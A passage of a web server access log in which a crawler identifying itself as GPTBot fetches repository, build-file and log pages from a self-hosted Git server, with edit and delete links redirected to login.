GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:35:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10099] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11488] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38766] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35844] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33447] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33639] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10976] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" +[17/Feb/2026:16:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33669] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" +[17/Feb/2026:16:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" +[17/Feb/2026:16:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" +[17/Feb/2026:16:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" +[17/Feb/2026:16:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21738] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" +[17/Feb/2026:16:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" +[17/Feb/2026:16:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" +[17/Feb/2026:16:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" +[17/Feb/2026:16:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10770] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12432] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:16:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11454] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:16:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html" [Client 74.7.227.38] [Length 38261] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:16:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33632] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38763] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10973] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31300] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23731] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33445] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:35:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 